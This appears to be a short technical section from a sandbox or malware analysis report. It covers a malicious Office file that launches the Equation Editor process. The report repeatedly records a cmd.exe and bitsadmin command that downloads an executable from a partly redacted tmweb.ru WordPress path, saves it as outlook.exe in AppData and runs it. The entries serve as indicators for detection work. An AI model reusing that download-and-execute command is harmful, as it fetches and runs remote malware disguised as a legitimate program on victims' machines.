Technical Information
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer Gd /priority foreground http://cb####6.tmweb.ru/wordpress/wp-includes/images/wlw/1pa.exe %APPDATA%\outlook.exe && start %APPDATA%\outlook.exe
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{faa72551-d92f-4344-abff-be933ac4acb3}.tmp
- DNS ASK cb####6.tmweb.ru
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer Gd /priority foreground http://cb####6.tmweb.ru/wordpress/wp-includes/images/wlw/1pa.exe %APPDATA%\outlook.exe && start %APPDATA%\outlook.exe' (with hidden window)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer Gd /priority foreground http://cb####6.tmweb.ru/wordpress/wp-includes/images/wlw/1pa.exe %APPDATA%\outlook.exe
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding